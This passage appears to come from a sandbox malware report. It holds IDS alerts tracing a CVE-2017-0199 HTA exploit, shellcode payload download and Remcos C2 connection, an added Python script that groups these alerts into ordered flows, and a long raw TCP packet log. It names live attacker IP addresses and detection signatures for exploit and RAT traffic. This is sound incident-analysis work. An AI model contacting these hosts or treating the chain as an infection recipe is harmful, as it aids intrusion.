2024-07-26T09:30:09.273485+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:30:09.273537+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:29:59.517585+0200 | TCP | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 80 | 49166 | 91.92.245.100 | 192.168.2.22
2024-07-26T09:29:57.196366+0200 | TCP | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 49164 | 80 | 192.168.2.22 | 91.92.245.100
2024-07-26T09:29:57.196370+0200 | TCP | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 80 | 49164 | 91.92.245.100 | 192.168.2.22
2024-07-26T09:30:09.273467+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:30:08.658935+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:30:09.544003+0200 | TCP | 2009080 | ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:30:16.371974+0200 | TCP | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 49168 | 2558 | 192.168.2.22 | 23.95.60.82
2024-07-26T09:30:20.216815+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 49169 | 80 | 192.168.2.22 | 178.237.33.50
2024-07-26T09:30:09.273374+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
2024-07-26T09:30:09.356737+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 80 | 49167 | 107.173.143.46 | 192.168.2.22
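The IDS alerts above are listed per packet and in no particular order, with half of them fired on the server-to-client direction, so the same HTTP exchange appears once with the sandbox host as source and once as destination. The Python below is an added example, not part of the Joe Sandbox report: it re-orients every alert so the side holding the ephemeral port is the client, groups the alerts into client-initiated flows, and orders the flows by first alert, which turns the table into the infection chain (two HTA fetches from 91.92.245.100, the shellcode/VMProtect payload from 107.173.143.46, the Remcos TLS session to 23.95.60.82:2558, and the later downloader request to 178.237.33.50). The alert rows are a subset copied from the table; the ephemeral-port threshold and the stage labels derived from signature keywords are this example's own heuristics.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample: a subset of the IDS alert rows from the report, as
# (timestamp, sid, signature, src_port, dst_port, src_ip, dst_ip). The eight
# identical shellcode alerts on port 49167 are represented by two of them.
ALERTS = [
    ("2024-07-26T09:29:59.517525+0200", 2024449, "ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl", 49166, 80, "192.168.2.22", "91.92.245.100"),
    ("2024-07-26T09:30:09.356706+0200", 2011803, "ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected", 80, 49167, "107.173.143.46", "192.168.2.22"),
    ("2024-07-26T09:29:59.517585+0200", 2024197, "ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)", 80, 49166, "91.92.245.100", "192.168.2.22"),
    ("2024-07-26T09:29:57.196366+0200", 2024449, "ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl", 49164, 80, "192.168.2.22", "91.92.245.100"),
    ("2024-07-26T09:29:57.196370+0200", 2024197, "ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)", 80, 49164, "91.92.245.100", "192.168.2.22"),
    ("2024-07-26T09:30:08.658935+0200", 2011803, "ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected", 80, 49167, "107.173.143.46", "192.168.2.22"),
    ("2024-07-26T09:30:09.544003+0200", 2009080, "ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile", 80, 49167, "107.173.143.46", "192.168.2.22"),
    ("2024-07-26T09:30:16.371974+0200", 2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 49168, 2558, "192.168.2.22", "23.95.60.82"),
    ("2024-07-26T09:30:20.216815+0200", 2803304, "ETPRO MALWARE Common Downloader Header Pattern HCa", 49169, 80, "192.168.2.22", "178.237.33.50"),
]

# Assumption: the client allocates source ports from the IANA dynamic range, as the
# sandbox host does here (49163 upwards). Adjust for hosts with a different range.
EPHEMERAL_MIN = 49152


def parse_ts(ts):
    """Parse the report's timestamp format, including the +0200 offset."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def orient(alert):
    """Return (client_ip, client_port, server_ip, server_port, inbound).

    The side holding the ephemeral port is the client, whichever direction the
    alerting packet travelled; inbound=True means the alert fired on server->client data.
    """
    _ts, _sid, _sig, sport, dport, sip, dip = alert
    if sport >= EPHEMERAL_MIN and dport < EPHEMERAL_MIN:
        return sip, sport, dip, dport, False
    if dport >= EPHEMERAL_MIN and sport < EPHEMERAL_MIN:
        return dip, dport, sip, sport, True
    raise ValueError(f"cannot orient flow {sip}:{sport} -> {dip}:{dport}")


def stage(signatures):
    """Heuristic stage label from ET signature wording (this example's own mapping)."""
    text = " ".join(signatures)
    if "CVE-2017-0199" in text or "HTA" in text:
        return "delivery (remote HTA via OLE link)"
    if "SHELLCODE" in text or "Packed Binary" in text:
        return "payload download"
    if "Remcos" in text:
        return "C2"
    if "Downloader" in text:
        return "follow-up download"
    return "unclassified"


def flows(alerts):
    """Group alerts into client-initiated flows and order them by first alert time."""
    groups = defaultdict(list)
    for alert in alerts:
        client, cport, server, sport, inbound = orient(alert)
        groups[(client, cport, server, sport)].append((parse_ts(alert[0]), alert[1], alert[2], inbound))
    summary = []
    for (client, cport, server, sport), events in sorted(groups.items(), key=lambda kv: min(e[0] for e in kv[1])):
        events.sort()
        summary.append({
            "client": f"{client}:{cport}",
            "server": f"{server}:{sport}",
            "first": events[0][0],
            "last": events[-1][0],
            "sids": sorted({sid for _, sid, _, _ in events}),
            "inbound_only": all(inbound for *_, inbound in events),
            "stage": stage(sig for _, _, sig, _ in events),
        })
    return summary


def servers_contacted(summary):
    """Distinct server endpoints, in the order the chain reached them (block-list candidates)."""
    seen = []
    for flow in summary:
        if flow["server"] not in seen:
            seen.append(flow["server"])
    return seen


if __name__ == "__main__":
    for flow in flows(ALERTS):
        print(f"{flow['first'].time()} {flow['client']} -> {flow['server']} {flow['sids']} {flow['stage']}")
    print(servers_contacted(flows(ALERTS)))
```

The "inbound_only" field is worth keeping: the payload flow on port 49167 is known only from server-to-client alerts (shellcode pattern and VMProtect binary in the HTTP response), so a rule set that only inspects client requests would miss it entirely.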
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 09:29:55.028450966 CEST | 49163 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:55.033349037 CEST | 80 | 49163 | 188.114.96.3 | 192.168.2.22
Jul 26, 2024 09:29:55.033447027 CEST | 49163 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:55.033576965 CEST | 49163 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:55.038393021 CEST | 80 | 49163 | 188.114.96.3 | 192.168.2.22
Jul 26, 2024 09:29:56.272893906 CEST | 80 | 49163 | 188.114.96.3 | 192.168.2.22
Jul 26, 2024 09:29:56.272974968 CEST | 49163 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:56.284629107 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:56.289411068 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:56.289494991 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:56.293190002 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:56.297970057 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196281910 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196291924 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196296930 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196366072 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.196369886 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196382999 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196400881 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196409941 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196418047 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.196422100 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196433067 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196439981 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.196449995 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.196465969 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.196496010 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.201488972 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.201514006 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.201536894 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.201554060 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.283590078 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.283616066 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.283632994 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.283649921 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.283691883 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.283719063 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.288568974 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.288592100 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.288608074 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.288624048 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.288644075 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.288672924 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.288672924 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.293411970 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.293432951 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.293448925 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.293464899 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.293478966 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.293483973 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.293498039 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.293519020 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.298216105 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.298238993 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.298255920 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.298270941 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.298280001 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.298293114 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.298321009 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.303003073 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.303029060 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.303044081 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.303059101 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.303075075 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.303093910 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.303107977 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.354244947 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.369920969 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.369957924 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.369973898 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.370001078 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.370001078 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.370021105 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.456037045 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456069946 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456085920 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456100941 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456118107 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456155062 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.456353903 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456378937 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456382990 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.456394911 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456402063 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.456410885 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456419945 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.456424952 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.456438065 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.456454039 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.532093048 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532110929 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532134056 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532147884 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532162905 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532243013 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.532550097 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532565117 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532579899 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532582045 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.532582998 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.532593966 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.532604933 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.532618999 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.532634020 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.608983040 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609002113 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609018087 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609052896 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.609071970 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.609083891 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609098911 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609122992 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.609137058 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.609500885 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609524965 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609539986 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609554052 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.609565973 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.609577894 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.609594107 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.726129055 CEST | 49165 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:57.731096029 CEST | 80 | 49165 | 188.114.96.3 | 192.168.2.22
Jul 26, 2024 09:29:57.731204033 CEST | 49165 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:57.731762886 CEST | 49165 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:57.733649969 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.733689070 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:57.736963034 CEST | 80 | 49165 | 188.114.96.3 | 192.168.2.22
Jul 26, 2024 09:29:57.741626024 CEST | 80 | 49164 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:57.741694927 CEST | 49164 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:58.860368013 CEST | 80 | 49165 | 188.114.96.3 | 192.168.2.22
Jul 26, 2024 09:29:58.860523939 CEST | 49165 | 80 | 192.168.2.22 | 188.114.96.3
Jul 26, 2024 09:29:58.875215054 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:58.880412102 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:58.880506992 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:58.880737066 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:58.885793924 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517443895 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517467022 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517477989 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517498970 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517513037 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517524004 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517524958 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.517570019 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.517570972 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.517570972 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.517585039 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517596960 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517606020 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517616034 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.517626047 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.517646074 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.517653942 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.522723913 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.522757053 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.522768021 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.522799015 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.522799015 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.524138927 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613042116 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613054991 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613065004 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613138914 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613141060 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613152981 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613195896 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613234043 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613251925 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613264084 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613284111 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613296032 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.613352060 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613352060 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613352060 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613352060 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613352060 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.613481045 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616414070 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616425991 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616436958 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616446972 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616457939 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616467953 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616477966 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616477966 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616477966 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616508961 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616543055 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616648912 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616660118 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616671085 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616681099 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616681099 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616689920 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616694927 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.616718054 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616718054 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.616733074 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.673721075 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.673746109 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.673749924 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.673753977 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.673819065 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.674141884 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.747890949 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.747910023 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.748034954 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.774787903 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.774807930 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.774826050 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.774837971 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.774859905 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.774868965 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.774883986 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.774930954 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.774930954 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
Jul 26, 2024 09:29:59.775099039 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.775114059 CEST | 80 | 49166 | 91.92.245.100 | 192.168.2.22
Jul 26, 2024 09:29:59.775150061 CEST | 49166 | 80 | 192.168.2.22 | 91.92.245.100
